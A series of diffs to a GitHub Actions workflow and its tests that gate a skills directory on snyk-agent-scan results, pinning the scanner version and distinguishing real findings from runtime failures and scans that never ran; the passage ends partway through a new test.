-  # or a review agent judges them; CI does not block on them.
+  # The list and the reasoning live in .github/scripts/registry_scan_contract.py, which
+  # is the single place this workflow's three readers get the vocabulary from. It is
+  # passed here as `--ignore-risks`, which is the flag that takes risk names.
   #
-  # The scanner has no severity threshold — `--ignore-failure-codes` is its only gating knob — so
-  # the rule is expressed by enumerating the W class. This is every W-code published in
-  # https://github.com/snyk/agent-scan/blob/main/docs/issue-codes.md. It is a class rule, not
-  # fifteen individual judgements, so it carries no per-code justification. W011 "exposure to
-  # untrusted third-party content", the one that fires on these skills today, is an accurate
-  # description of what they do: they read a repository's own CI configuration, workflow files,
-  # and job logs, none of which the skill authored.
-  #
-  # NO E-CODE MAY EVER APPEAR HERE — that would silently disarm the gate, and
-  # tests/test_registry_scan_workflow.py fails if one does. When the scanner publishes a new
-  # W-code it will fail this build once; adding it here is the conscious update that follows.
-  IGNORED_ISSUE_CODES: W001,W007,W008,W009,W011,W012,W013,W014,W015,W016,W017,W018,W019,W020,W021
-
-  # The scanner reads skills out of a directory of `<name>/SKILL.md` subdirectories. This is the
-  # installable tree: exactly what the `skills` CLI copies onto a user's machine and what a
-  # registry publishes.
+  # NOT `--ignore-failure-codes`. That is a DIFFERENT flag, not the renamed one: it
+  # accepts only the scanner's X001-X009 runtime codes. Passing the old W-list to it
+  # made the scanner print `unknown failure code: W001` fifteen times a run and left
+  # every risk of every score blocking — the gating policy off, on a green build.
   SCAN_PATH: skills
 
 jobs:
@@ -146,7 +133,7 @@ jobs:
       # step goes red and we find out from our own CI instead of from a public audit page.
       # The offending string is assembled at runtime — committing one is the thing we're guarding
       # against — so nothing in this repository contains it. It runs the gate's real flags,
-      # IGNORED_ISSUE_CODES included, so an ignore list that grew to swallow the anchor rule
+      # the non-blocking risk list included, so an exemption that grew to swallow the anchor
       # would fail here rather than quietly neutering the gate.
       #
       # `continue-on-error` here does NOT make the control advisory — the
@@ -225,7 +212,7 @@ jobs:
             --ci \
             --verbose \
             --dangerously-run-mcp-servers \
-            --ignore-failure-codes "${IGNORED_ISSUE_CODES}" 2>&1 | tee gate-output.txt
+            --ignore-risks "$(python .github/scripts/registry_scan_ignored.py)" 2>&1 | tee gate-output.txt
           code=${PIPESTATUS[0]}
           set -e
           echo "scan_exit=${code}" >> "${GITHUB_OUTPUT}"
@@ -241,18 +228,22 @@ jobs:
             # does not ignore because a scan that broke is not a scan that passed.
             # Both are failures; only one is a finding, and reporting an X as a
             # critical is the same false verdict as reporting a usage error was.
-            if grep -qE '\bE[0-9]{3}\b' gate-output.txt; then
+            # 0.6.0 names its reason in the exit line: `CI (--ci): exiting with
+            # code 1 (risks found)` for a finding, `runtime failure codes: X###` when
+            # the scanner itself broke. Both are exit 1, and only the first is a
+            # security result. Grepping for E-codes here matched nothing 0.6.0 emits,
+            # so every real finding fell through to the coverage-gap branch below and
+            # was announced as NOT A FINDING.
+            if grep -q 'risks found' gate-output.txt; then
               echo "scan_class=finding" >> "${GITHUB_OUTPUT}"
-              echo "Gate failed: an E-class critical finding is present. Its code is above."
+              echo "Gate failed: a blocking risk is present. Its name and evidence are above."
               exit 1
             fi
-            if grep -qE '\bX[0-9]{3}\b' gate-output.txt; then
+            if grep -q 'runtime failure codes' gate-output.txt; then
               echo "scan_class=operational" >> "${GITHUB_OUTPUT}"
-              echo "::error title=REGISTRY SCAN DID NOT COMPLETE::The scanner reported an X-class runtime failure, not a finding. Nothing under '${SCAN_PATH}' was fully checked. This is a coverage gap, not a security finding."
+              echo "::error title=REGISTRY SCAN DID NOT COMPLETE::The scanner reported a runtime failure, not a finding. Nothing under '${SCAN_PATH}' was fully checked. This is a coverage gap, not a security finding."
               exit 1
             fi
-            # Neither class named. Do NOT guess: asserting "critical finding" on an
-            # unclassifiable exit is how the five-day false verdict happened.
             echo "scan_class=indeterminate" >> "${GITHUB_OUTPUT}"
             echo "::error title=REGISTRY SCAN RESULT UNCLASSIFIED::The scanner exited 1 without naming an E- or X-class code, so this run cannot say whether that was a finding or a runtime failure. Read the log above before treating it as either."
             exit 1

--- a/.github/workflows/registry-scan.yml
+++ b/.github/workflows/registry-scan.yml
@@ -42,7 +42,7 @@ env:
   # summary, and the raw finding set uploaded as the `registry-scan-findings` artifact. A human
   # or a review agent judges them; CI does not block on them.
   #
-  # The scanner has no severity threshold — `--ignore-issues-codes` is its only gating knob — so
+  # The scanner has no severity threshold — `--ignore-failure-codes` is its only gating knob — so
   # the rule is expressed by enumerating the W class. This is every W-code published in
   # https://github.com/snyk/agent-scan/blob/main/docs/issue-codes.md. It is a class rule, not
   # fifteen individual judgements, so it carries no per-code justification. W011 "exposure to
@@ -164,7 +164,7 @@ jobs:
         run: python .github/scripts/registry_scan_redprove.py
 
       # Two passes, on purpose, and exactly two — the scanner is a network service, so every
-      # invocation costs. `--ignore-issues-codes` filters findings out of the printed report as
+      # invocation costs. `--ignore-failure-codes` filters findings out of the printed report as
       # well as out of the exit status, so the gating pass below is structurally incapable of
       # showing a warning: it runs with the very flags that hide them. This pass carries no
       # ignore list and is the only one that sees everything.
@@ -177,7 +177,7 @@ jobs:
         continue-on-error: true
         run: |
           echo "Scanning '${SCAN_PATH}' with no ignore list — every finding the scanner has."
-          uvx snyk-agent-scan@latest scan "${SCAN_PATH}" --json > registry-scan-findings.json
+          uvx snyk-agent-scan==0.6.0 scan "${SCAN_PATH}" --json > registry-scan-findings.json
 
       # Warnings never fail this build, so they must be impossible to miss instead. This writes
       # each one to the checks tab as an annotation (where a review agent can query it), to the
@@ -207,14 +207,38 @@ jobs:
       # "we looked and found something". Without it that step reads only the
       # control's outcome, and a run where the control failed AND a critical was
       # reported goes red annotated NOT A FINDING.
+      #
+      # The exit code is captured rather than allowed to fail the step, because
+      # `--ci` uses exit 1 for "a finding is present" while the scanner uses exit
+      # 2 for "I could not start" — a usage error from a renamed flag, a missing
+      # token, an unparseable argument. Letting both surface as a bare non-zero
+      # made the step below read a crash as a finding, and for five days this
+      # build announced `The gate reported a critical finding in skills` when
+      # nothing had been scanned at all (2026-08-20 → 2026-08-25, after the
+      # scanner renamed `--ignore-issues-codes`). A scan that never ran is a
+      # coverage gap; only exit 1 is a finding.
       - name: Gate on critical findings
         id: gate
         run: |
-          uvx snyk-agent-scan@latest scan "${SCAN_PATH}" \
+          set +e
+          uvx snyk-agent-scan==0.6.0 scan "${SCAN_PATH}" \
             --ci \
             --verbose \
             --dangerously-run-mcp-servers \
-            --ignore-issues-codes "${IGNORED_ISSUE_CODES}"
+            --ignore-failure-codes "${IGNORED_ISSUE_CODES}"
+          code=$?
+          set -e
+          echo "scan_exit=${code}" >> "${GITHUB_OUTPUT}"
+          if [ "${code}" -eq 0 ]; then
+            echo "Gate passed: no critical finding under '${SCAN_PATH}'."
+            exit 0
+          fi
+          if [ "${code}" -eq 1 ]; then
+            echo "Gate failed: a critical finding is present. Its issue code is above."
+            exit 1
+          fi
+          echo "::error title=REGISTRY SCAN DID NOT RUN::The scanner exited ${code} without completing a scan — it could not start, so NOTHING under '${SCAN_PATH}' was checked. This is a coverage gap, not a finding and not a clean result. Read this step's log: a usage error here usually means the scanner renamed a flag out from under us."
+          exit 1
 
       # Two red checks that mean opposite things must not look the same. A gate
       # failure above means "a critical finding is in this tree". This step means
@@ -244,6 +268,10 @@ jobs:
           # in the tree, and the unfiltered pass behind the control can still
           # surface one. Announcing the coverage gap over that run would put
           # "NOT A FINDING" on the one result a human most needs to read.
+          if [ "${{ steps.gate.outcome }}" = "failure" ] && [ "${{ steps.gate.outputs.scan_exit }}" != "1" ]; then
+            echo "::error title=REGISTRY SCAN DID NOT RUN — NOT A FINDING::The scanner exited ${{ steps.gate.outputs.scan_exit }} without completing a scan, so nothing under ${SCAN_PATH} was checked. This is a coverage gap. Do NOT read it as a security finding."
+            exit 1
+          fi
           if [ "${{ steps.gate.outcome }}" = "failure" ]; then
             echo "::error title=REGISTRY SCAN FINDING — AND THE CONTROL WAS BLIND::The gate reported a critical finding in ${SCAN_PATH}. Treat it as a real finding and read the gate step above for its issue code. Separately, the control also failed, so the scan's SILENCE elsewhere carries no information — this run is a floor on what is present, not a ceiling."
             {

--- a/.github/workflows/registry-scan.yml
+++ b/.github/workflows/registry-scan.yml
@@ -225,16 +225,36 @@ jobs:
             --ci \
             --verbose \
             --dangerously-run-mcp-servers \
-            --ignore-failure-codes "${IGNORED_ISSUE_CODES}"
-          code=$?
+            --ignore-failure-codes "${IGNORED_ISSUE_CODES}" 2>&1 | tee gate-output.txt
+          code=${PIPESTATUS[0]}
           set -e
           echo "scan_exit=${code}" >> "${GITHUB_OUTPUT}"
           if [ "${code}" -eq 0 ]; then
             echo "Gate passed: no critical finding under '${SCAN_PATH}'."
+            echo "scan_class=clean" >> "${GITHUB_OUTPUT}"
             exit 0
           fi
           if [ "${code}" -eq 1 ]; then
-            echo "Gate failed: a critical finding is present. Its issue code is above."
+            # Exit 1 is TWO different events. `--ci` returns it for an unignored
+            # E-class finding — a real security result — and equally for the
+            # scanner's own X-class runtime failure, which this gate deliberately
+            # does not ignore because a scan that broke is not a scan that passed.
+            # Both are failures; only one is a finding, and reporting an X as a
+            # critical is the same false verdict as reporting a usage error was.
+            if grep -qE '\bE[0-9]{3}\b' gate-output.txt; then
+              echo "scan_class=finding" >> "${GITHUB_OUTPUT}"
+              echo "Gate failed: an E-class critical finding is present. Its code is above."
+              exit 1
+            fi
+            if grep -qE '\bX[0-9]{3}\b' gate-output.txt; then
+              echo "scan_class=operational" >> "${GITHUB_OUTPUT}"
+              echo "::error title=REGISTRY SCAN DID NOT COMPLETE::The scanner reported an X-class runtime failure, not a finding. Nothing under '${SCAN_PATH}' was fully checked. This is a coverage gap, not a security finding."
+              exit 1
+            fi
+            # Neither class named. Do NOT guess: asserting "critical finding" on an
+            # unclassifiable exit is how the five-day false verdict happened.
+            echo "scan_class=indeterminate" >> "${GITHUB_OUTPUT}"
+            echo "::error title=REGISTRY SCAN RESULT UNCLASSIFIED::The scanner exited 1 without naming an E- or X-class code, so this run cannot say whether that was a finding or a runtime failure. Read the log above before treating it as either."
             exit 1
           fi
           echo "::error title=REGISTRY SCAN DID NOT RUN::The scanner exited ${code} without completing a scan — it could not start, so NOTHING under '${SCAN_PATH}' was checked. This is a coverage gap, not a finding and not a clean result. Read this step's log: a usage error here usually means the scanner renamed a flag out from under us."
@@ -268,8 +288,8 @@ jobs:
           # in the tree, and the unfiltered pass behind the control can still
           # surface one. Announcing the coverage gap over that run would put
           # "NOT A FINDING" on the one result a human most needs to read.
-          if [ "${{ steps.gate.outcome }}" = "failure" ] && [ "${{ steps.gate.outputs.scan_exit }}" != "1" ]; then
-            echo "::error title=REGISTRY SCAN DID NOT RUN — NOT A FINDING::The scanner exited ${{ steps.gate.outputs.scan_exit }} without completing a scan, so nothing under ${SCAN_PATH} was checked. This is a coverage gap. Do NOT read it as a security finding."
+          if [ "${{ steps.gate.outcome }}" = "failure" ] && [ "${{ steps.gate.outputs.scan_class }}" != "finding" ]; then
+            echo "::error title=REGISTRY SCAN DID NOT RUN — NOT A FINDING::The scan did not produce a finding (exit ${{ steps.gate.outputs.scan_exit }}, class ${{ steps.gate.outputs.scan_class }}), so nothing under ${SCAN_PATH} was verified clean. This is a coverage gap. Do NOT read it as a security finding."
             exit 1
           fi
           if [ "${{ steps.gate.outcome }}" = "failure" ]; then

--- a/.github/workflows/registry-scan.yml
+++ b/.github/workflows/registry-scan.yml
@@ -47,6 +47,14 @@ env:
   # every risk of every score blocking — the gating policy off, on a green build.
   SCAN_PATH: skills
 
+  # Read from the contract so the pin is named in one place. Every coverage-gap message
+  # below ends with it.
+  STALE_PIN_HINT: >-
+    If this is not obviously a problem with the skills themselves, suspect the scanner
+    pin first: this gate runs snyk-agent-scan==0.6.0, and a newer release can rename a
+    flag, a risk, or the JSON shape out from under it. Compare against the current
+    release before assuming the tree is at fault.
+
 jobs:
   scan:
     name: registry scan
@@ -213,12 +221,12 @@ jobs:
           # is silently off — which on a tree with no risks is a green build.
           if ! ignored=$(python .github/scripts/registry_scan_ignored.py); then
             echo "scan_class=did-not-run" >> "${GITHUB_OUTPUT}"
-            echo "::error title=REGISTRY SCAN DID NOT RUN::The exemption list could not be built from .github/scripts/registry_scan_contract.py, so the gating rule is unknown and nothing was scanned. This is a coverage gap, not a finding and not a clean result."
+            echo "::error title=REGISTRY SCAN DID NOT RUN::The exemption list could not be built from .github/scripts/registry_scan_contract.py, so the gating rule is unknown and nothing was scanned. This is a coverage gap, not a finding and not a clean result. ${STALE_PIN_HINT}"
             exit 1
           fi
           if [ -z "${ignored}" ]; then
             echo "scan_class=did-not-run" >> "${GITHUB_OUTPUT}"
-            echo "::error title=REGISTRY SCAN DID NOT RUN::The exemption list came back empty. That is never correct — the ruling exempts exactly one risk — and an empty --ignore-risks would run the gate under a policy nobody chose."
+            echo "::error title=REGISTRY SCAN DID NOT RUN::The exemption list came back empty. That is never correct — the ruling exempts exactly one risk — and an empty --ignore-risks would run the gate under a policy nobody chose. ${STALE_PIN_HINT}"
             exit 1
           fi
           set +e
@@ -236,7 +244,7 @@ jobs:
           # retired name is read here rather than left to be noticed when the risk next fires.
           if grep -q 'unknown risk name' gate-output.txt; then
             echo "scan_class=exemption-stale" >> "${GITHUB_OUTPUT}"
-            echo "::error title=REGISTRY SCAN EXEMPTION IS STALE::The scanner does not recognise a risk name in this gate's exemption list, so it dropped it and scanned under a policy nobody chose. Update NON_BLOCKING_RISKS in .github/scripts/registry_scan_contract.py to the scanner's current catalog. This is a coverage gap, not a finding."
+            echo "::error title=REGISTRY SCAN EXEMPTION IS STALE::The scanner does not recognise a risk name in this gate's exemption list, so it dropped it and scanned under a policy nobody chose. Update NON_BLOCKING_RISKS in .github/scripts/registry_scan_contract.py to the scanner's current catalog. This is a coverage gap, not a finding. ${STALE_PIN_HINT}"
             exit 1
           fi
           if [ "${code}" -eq 0 ]; then
@@ -275,15 +283,15 @@ jobs:
             fi
             if grep -q 'runtime failure codes:' gate-output.txt; then
               echo "scan_class=operational" >> "${GITHUB_OUTPUT}"
-              echo "::error title=REGISTRY SCAN DID NOT COMPLETE::The scanner reported a runtime failure, not a finding. Nothing under '${SCAN_PATH}' was fully checked. This is a coverage gap, not a security finding."
+              echo "::error title=REGISTRY SCAN DID NOT COMPLETE::The scanner reported a runtime failure, not a finding. Nothing under '${SCAN_PATH}' was fully checked. This is a coverage gap, not a security finding. ${STALE_PIN_HINT}"
               exit 1
             fi
             echo "scan_class=indeterminate" >> "${GITHUB_OUTPUT}"
-            echo "::error title=REGISTRY SCAN RESULT UNCLASSIFIED::The scanner exited 1 without naming a reason on its exit line, so this run cannot say whether that was a risk it found or a runtime failure of its own. Read the log above before treating it as either."
+            echo "::error title=REGISTRY SCAN RESULT UNCLASSIFIED::The scanner exited 1 without naming a reason on its exit line, so this run cannot say whether that was a risk it found or a runtime failure of its own. Read the log above before treating it as either. ${STALE_PIN_HINT}"
             exit 1
           fi
           echo "scan_class=did-not-run" >> "${GITHUB_OUTPUT}"
-          echo "::error title=REGISTRY SCAN DID NOT RUN::The scanner exited ${code} without completing a scan — it could not start, so NOTHING under '${SCAN_PATH}' was checked. This is a coverage gap, not a finding and not a clean result. Read this step's log: a usage error here usually means the scanner renamed a flag out from under us."
+          echo "::error title=REGISTRY SCAN DID NOT RUN::The scanner exited ${code} without completing a scan — it could not start, so NOTHING under '${SCAN_PATH}' was checked. This is a coverage gap, not a finding and not a clean result. Read this step's log: a usage error here usually means the scanner renamed a flag out from under us. ${STALE_PIN_HINT}"
           exit 1
 
       # Two red checks that mean opposite things must not look the same. A gate
@@ -308,7 +316,7 @@ jobs:
           # control's verdict rather than after it, which is what made the branch at the
           # end of this step unreachable in exactly the case it was written for.
           if [ "${{ steps.gate.outcome }}" != "success" ] && [ "${{ steps.gate.outcome }}" != "failure" ]; then
-            echo "::error title=REGISTRY SCAN GATE DID NOT RUN::The gating scan did not run (outcome: ${{ steps.gate.outcome }}), so nothing was checked for critical findings. Read the failing step above. This is a coverage gap, not a clean result."
+            echo "::error title=REGISTRY SCAN GATE DID NOT RUN::The gating scan did not run (outcome: ${{ steps.gate.outcome }}), so nothing was checked for critical findings. Read the failing step above. This is a coverage gap, not a clean result. ${STALE_PIN_HINT}"
             exit 1
           fi
           if [ "${{ steps.red_proof.outcome }}" = "success" ]; then
@@ -316,7 +324,7 @@ jobs:
             exit 0
           fi
           if [ "${{ steps.red_proof.outcome }}" != "failure" ]; then
-            echo "::error title=REGISTRY SCAN CONTROL DID NOT RUN::The control step did not run (outcome: ${{ steps.red_proof.outcome }}), so nothing here established whether the scanner can see. Read the failing step above."
+            echo "::error title=REGISTRY SCAN CONTROL DID NOT RUN::The control step did not run (outcome: ${{ steps.red_proof.outcome }}), so nothing here established whether the scanner can see. Read the failing step above. ${STALE_PIN_HINT}"
             exit 1
           fi
           # The two failures are not exclusive, and this ordering matters: a blind
@@ -325,7 +333,7 @@ jobs:
           # surface one. Announcing the coverage gap over that run would put
           # "NOT A FINDING" on the one result a human most needs to read.
           if [ "${{ steps.gate.outcome }}" = "failure" ] && [ "${{ steps.gate.outputs.scan_class }}" != "finding" ]; then
-            echo "::error title=REGISTRY SCAN DID NOT RUN — NOT A FINDING::The scan did not produce a finding (exit ${{ steps.gate.outputs.scan_exit }}, class ${{ steps.gate.outputs.scan_class }}), so nothing under ${SCAN_PATH} was verified clean. This is a coverage gap. Do NOT read it as a security finding."
+            echo "::error title=REGISTRY SCAN DID NOT RUN — NOT A FINDING::The scan did not produce a finding (exit ${{ steps.gate.outputs.scan_exit }}, class ${{ steps.gate.outputs.scan_class }}), so nothing under ${SCAN_PATH} was verified clean. This is a coverage gap. Do NOT read it as a security finding. ${STALE_PIN_HINT}"
             exit 1
           fi
           if [ "${{ steps.gate.outcome }}" = "failure" ]; then

--- a/.github/workflows/registry-scan.yml
+++ b/.github/workflows/registry-scan.yml
@@ -151,15 +151,15 @@ jobs:
         run: python .github/scripts/registry_scan_redprove.py
 
       # Two passes, on purpose, and exactly two — the scanner is a network service, so every
-      # invocation costs. `--ignore-failure-codes` filters findings out of the printed report as
-      # well as out of the exit status, so the gating pass below is structurally incapable of
-      # showing a warning: it runs with the very flags that hide them. This pass carries no
-      # ignore list and is the only one that sees everything.
+      # invocation costs. `--ignore-risks` nulls the exempt risks out of the response BEFORE it
+      # is printed, not just before the exit status is computed, so the gating pass below is
+      # structurally incapable of showing an exempt finding: it runs with the very flag that
+      # hides them. This pass carries no exemption list and is the only one that sees everything.
       #
       # It emits `--json` rather than the rich report because the JSON is what the next step
-      # turns into annotations, a summary table, and an artifact — and because the scanner's own
-      # printer silently drops the codes W003-W006 from the result, mutating it in place as it
-      # prints. JSON skips the printer entirely, so it is strictly the more complete output.
+      # turns into annotations, a summary table, and an artifact, and because it carries the
+      # per-entry `error` objects and the 0-1000 scores that the rich printer renders for a
+      # human rather than for a parser.
       - name: Scan (all findings, unfiltered)
         continue-on-error: true
         run: |
@@ -184,9 +184,9 @@ jobs:
           if-no-files-found: warn
 
       # The authoritative gate, and the only step that fails on a finding. `--ci` turns any
-      # remaining finding into exit 1; with the W class ignored, "remaining" means the critical
-      # E-class, plus the scanner's own X-class runtime failures, which are deliberately NOT
-      # ignored — a scan that broke is not a scan that passed.
+      # remaining risk into exit 1; with the one exempt risk ignored, "remaining" means every
+      # other risk 0.6.0 can report, plus the scanner's own runtime failures, which are
+      # deliberately NOT ignored — a scan that broke is not a scan that passed.
       # `--dangerously-run-mcp-servers` is required by `--ci`; it only affects MCP server configs,
       # and this path contains skill directories only, so nothing is executed.
       #
@@ -207,15 +207,38 @@ jobs:
       - name: Gate on critical findings
         id: gate
         run: |
+          # Build the exemption list FIRST and check it. Inlining it into the command as
+          # `--ignore-risks "$(python ...)"` discards the shim's exit status: a traceback
+          # becomes an empty argument, the scanner exempts nothing, and the owner's ruling
+          # is silently off — which on a tree with no risks is a green build.
+          if ! ignored=$(python .github/scripts/registry_scan_ignored.py); then
+            echo "scan_class=did-not-run" >> "${GITHUB_OUTPUT}"
+            echo "::error title=REGISTRY SCAN DID NOT RUN::The exemption list could not be built from .github/scripts/registry_scan_contract.py, so the gating rule is unknown and nothing was scanned. This is a coverage gap, not a finding and not a clean result."
+            exit 1
+          fi
+          if [ -z "${ignored}" ]; then
+            echo "scan_class=did-not-run" >> "${GITHUB_OUTPUT}"
+            echo "::error title=REGISTRY SCAN DID NOT RUN::The exemption list came back empty. That is never correct — the ruling exempts exactly one risk — and an empty --ignore-risks would run the gate under a policy nobody chose."
+            exit 1
+          fi
           set +e
           uvx snyk-agent-scan==0.6.0 scan "${SCAN_PATH}" \
             --ci \
             --verbose \
             --dangerously-run-mcp-servers \
-            --ignore-risks "$(python .github/scripts/registry_scan_ignored.py)" 2>&1 | tee gate-output.txt
+            --ignore-risks "${ignored}" 2>&1 | tee gate-output.txt
           code=${PIPESTATUS[0]}
           set -e
           echo "scan_exit=${code}" >> "${GITHUB_OUTPUT}"
+          # The scanner does not fail on an exemption name it does not recognise: it prints
+          # `Warning: unknown risk name: <n>` and drops it. That is precisely how the last
+          # outage hid — fifteen `unknown failure code: W001` lines on a green build — so a
+          # retired name is read here rather than left to be noticed when the risk next fires.
+          if grep -q 'unknown risk name' gate-output.txt; then
+            echo "scan_class=exemption-stale" >> "${GITHUB_OUTPUT}"
+            echo "::error title=REGISTRY SCAN EXEMPTION IS STALE::The scanner does not recognise a risk name in this gate's exemption list, so it dropped it and scanned under a policy nobody chose. Update NON_BLOCKING_RISKS in .github/scripts/registry_scan_contract.py to the scanner's current catalog. This is a coverage gap, not a finding."
+            exit 1
+          fi
           if [ "${code}" -eq 0 ]; then
             echo "Gate passed: no critical finding under '${SCAN_PATH}'."
             echo "scan_class=clean" >> "${GITHUB_OUTPUT}"
@@ -234,20 +257,32 @@ jobs:
             # security result. Grepping for E-codes here matched nothing 0.6.0 emits,
             # so every real finding fell through to the coverage-gap branch below and
             # was announced as NOT A FINDING.
-            if grep -q 'risks found' gate-output.txt; then
+            #
+            # ANCHORED on the exit line, not searched for anywhere in the log. This step
+            # captures the scanner's `--verbose` output, which echoes the description and
+            # evidence text of the skills being scanned — and these are CI-security skills,
+            # for which "risks found" is ordinary prose. A bare substring search let the
+            # scanned tree classify a crashed scan as a security finding.
+            if grep -q 'exiting with code 1 (risks found' gate-output.txt; then
               echo "scan_class=finding" >> "${GITHUB_OUTPUT}"
+              # A titled annotation, not a bare echo: the reporter deliberately leaves
+              # blocking risks to this step, so without one a real finding is the only
+              # failure state on this workflow that reaches the checks API with nothing
+              # attached — on the run a review agent most needs to read.
+              echo "::error title=REGISTRY SCAN FINDING::The gate reported a blocking risk under '${SCAN_PATH}'. This IS a security finding: its risk name, 0-1000 score and evidence are in this step's log above."
               echo "Gate failed: a blocking risk is present. Its name and evidence are above."
               exit 1
             fi
-            if grep -q 'runtime failure codes' gate-output.txt; then
+            if grep -q 'runtime failure codes:' gate-output.txt; then
               echo "scan_class=operational" >> "${GITHUB_OUTPUT}"
               echo "::error title=REGISTRY SCAN DID NOT COMPLETE::The scanner reported a runtime failure, not a finding. Nothing under '${SCAN_PATH}' was fully checked. This is a coverage gap, not a security finding."
               exit 1
             fi
             echo "scan_class=indeterminate" >> "${GITHUB_OUTPUT}"
-            echo "::error title=REGISTRY SCAN RESULT UNCLASSIFIED::The scanner exited 1 without naming an E- or X-class code, so this run cannot say whether that was a finding or a runtime failure. Read the log above before treating it as either."
+            echo "::error title=REGISTRY SCAN RESULT UNCLASSIFIED::The scanner exited 1 without naming a reason on its exit line, so this run cannot say whether that was a risk it found or a runtime failure of its own. Read the log above before treating it as either."
             exit 1
           fi
+          echo "scan_class=did-not-run" >> "${GITHUB_OUTPUT}"
           echo "::error title=REGISTRY SCAN DID NOT RUN::The scanner exited ${code} without completing a scan — it could not start, so NOTHING under '${SCAN_PATH}' was checked. This is a coverage gap, not a finding and not a clean result. Read this step's log: a usage error here usually means the scanner renamed a flag out from under us."
           exit 1
 
@@ -266,6 +301,16 @@ jobs:
       - name: Report the coverage gap
         if: ${{ !cancelled() }}
         run: |
+          # A SKIPPED gate is not a clean gate, and a passing control does not make a run
+          # whose gate never executed meaningful. The steps between the control and the
+          # gate are not all continue-on-error — `Surface findings` fails on unreadable
+          # scan output — so this is a reachable state, and it must be read BEFORE the
+          # control's verdict rather than after it, which is what made the branch at the
+          # end of this step unreachable in exactly the case it was written for.
+          if [ "${{ steps.gate.outcome }}" != "success" ] && [ "${{ steps.gate.outcome }}" != "failure" ]; then
+            echo "::error title=REGISTRY SCAN GATE DID NOT RUN::The gating scan did not run (outcome: ${{ steps.gate.outcome }}), so nothing was checked for critical findings. Read the failing step above. This is a coverage gap, not a clean result."
+            exit 1
+          fi
           if [ "${{ steps.red_proof.outcome }}" = "success" ]; then
             echo "Control passed: the scanner reported the anchor finding, so this run's result is meaningful."
             exit 0
@@ -284,25 +329,17 @@ jobs:
             exit 1
           fi
           if [ "${{ steps.gate.outcome }}" = "failure" ]; then
-            echo "::error title=REGISTRY SCAN FINDING — AND THE CONTROL WAS BLIND::The gate reported a critical finding in ${SCAN_PATH}. Treat it as a real finding and read the gate step above for its issue code. Separately, the control also failed, so the scan's SILENCE elsewhere carries no information — this run is a floor on what is present, not a ceiling."
+            echo "::error title=REGISTRY SCAN FINDING — AND THE CONTROL WAS BLIND::The gate reported a critical finding in ${SCAN_PATH}. Treat it as a real finding and read the gate step above for its risk name and score. Separately, the control also failed, so the scan's SILENCE elsewhere carries no information — this run is a floor on what is present, not a ceiling."
             {
               echo "## Registry scan: a finding, on a run that also verified nothing else"
               echo ""
               echo "The gating step reported a critical finding under \`${SCAN_PATH}\`."
-              echo "**This IS a security finding** — its issue code is in the gate step's log."
+              echo "**This IS a security finding** — its risk name and score are in the gate step's log."
               echo ""
               echo "The control skill ALSO came back clean on this run, so everything the"
               echo "scan did NOT report is unverified. Treat the finding above as a floor,"
               echo "not as the complete set."
             } >> "${GITHUB_STEP_SUMMARY}"
-            exit 1
-          fi
-          # A SKIPPED gate is not a clean gate. The steps between the control and
-          # the gate are not all continue-on-error, so one of them failing leaves
-          # the gate unrun — and the coverage-gap text below asserts a verified
-          # cause that such a run never established.
-          if [ "${{ steps.gate.outcome }}" != "success" ]; then
-            echo "::error title=REGISTRY SCAN GATE DID NOT RUN::The gating scan did not run (outcome: ${{ steps.gate.outcome }}), so nothing was checked for critical findings. Read the failing step above. This is a coverage gap, not a clean result."
             exit 1
           fi
           echo "::error title=REGISTRY SCAN COVERAGE GAP — NOT A FINDING::The scanner reported nothing on a deliberately malicious control skill, so this run verified NOTHING about ${SCAN_PATH}. This is a coverage gap, not a clean result and not a security finding."
@@ -315,7 +352,7 @@ jobs:
             echo "means nothing either."
             echo ""
             echo "**This is not a security finding.** A finding fails the gate step above and"
-            echo "names its issue code."
+            echo "names its risk."
             echo ""
             echo "Known cause, verified against the live API on 2026-08-19: the analysis"
             echo "endpoint answers HTTP 200 with an empty finding set on both API versions it"

--- a/tests/test_registry_scan_workflow.py
+++ b/tests/test_registry_scan_workflow.py
@@ -17,8 +17,11 @@ inside the workflow itself on every run.
 """
 from __future__ import annotations
 
+import importlib.util
 import json
+import pathlib
 import re
+import tempfile
 from pathlib import Path
 
 import pytest
@@ -836,3 +839,45 @@ def test_an_unclassifiable_exit_one_is_never_called_a_finding(workflow: dict):
         "the gate lost its unclassified branch, so an exit 1 naming no code falls "
         "through to whichever label happens to be last")
     assert "UNCLASSIFIED" in run
+
+
+def test_the_redprove_anchor_is_falsifiable_and_is_what_the_fixture_contains():
+    """The control's anchor must be a string only a working scanner can produce.
+
+    It was the vendor code `E005` until scanner 0.6.0 replaced issue codes with named
+    risks, at which point the control reported a blind scanner while the scanner was
+    demonstrably seeing — it returned `2 risks` on the same fixture. Anchoring on
+    vendor vocabulary means a rename reads as a detection failure.
+
+    The anchor is now the fixture's own malicious host, produced by the SAME function
+    that builds the fixture, so the two cannot drift apart and no installer-host
+    literal lands on disk (which this repo's IOC guard forbids, and which the
+    red-proof module goes out of its way to avoid).
+
+    Two ways this could rot into a meaningless green, both pinned: a trivial anchor
+    that any output satisfies, and an anchor the fixture does not actually contain.
+    """
+    src = (_REPO / ".github" / "scripts" / "registry_scan_redprove.py").read_text()
+
+    spec = importlib.util.spec_from_file_location(
+        "_redprove", _REPO / ".github" / "scripts" / "registry_scan_redprove.py")
+    mod = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(mod)
+    anchor = mod.expected_evidence()
+
+    assert len(anchor) >= 12, (
+        f"the anchor is {anchor!r} — too short to be evidence of anything. A trivial "
+        "anchor is satisfied by a scanner that says nothing, which is exactly the "
+        "blind-scanner case this control exists to catch")
+
+    with tempfile.TemporaryDirectory() as tmp:
+        mod.build_violating_skill(pathlib.Path(tmp))
+        fixture = (pathlib.Path(tmp) / "redprove-fixture" / "SKILL.md").read_text()
+    assert anchor in fixture, (
+        f"the anchor is {anchor!r}, which the fixture this script writes does not "
+        "contain — so the scanner cannot echo it back and the control can never pass, "
+        "however well the scanner is working")
+
+    code_lines = [ln for ln in src.splitlines() if not ln.lstrip().startswith("#")]
+    assert not [ln for ln in code_lines if "E005" in ln], (
+        "the red-proof still USES the retired E005 code, not just mentions it")

--- a/tests/test_registry_scan_workflow.py
+++ b/tests/test_registry_scan_workflow.py
@@ -796,3 +796,43 @@ def test_the_scanner_version_is_pinned(workflow: dict):
             "the scanner is back on @latest — an upstream rename will redden this "
             "build again with no commit of ours")
         assert "snyk-agent-scan==" in run, "the scanner invocation is not version-pinned"
+
+
+def test_an_x_class_runtime_failure_is_not_reported_as_a_finding(workflow: dict):
+    """Exit 1 is two different events, and only one of them is a finding.
+
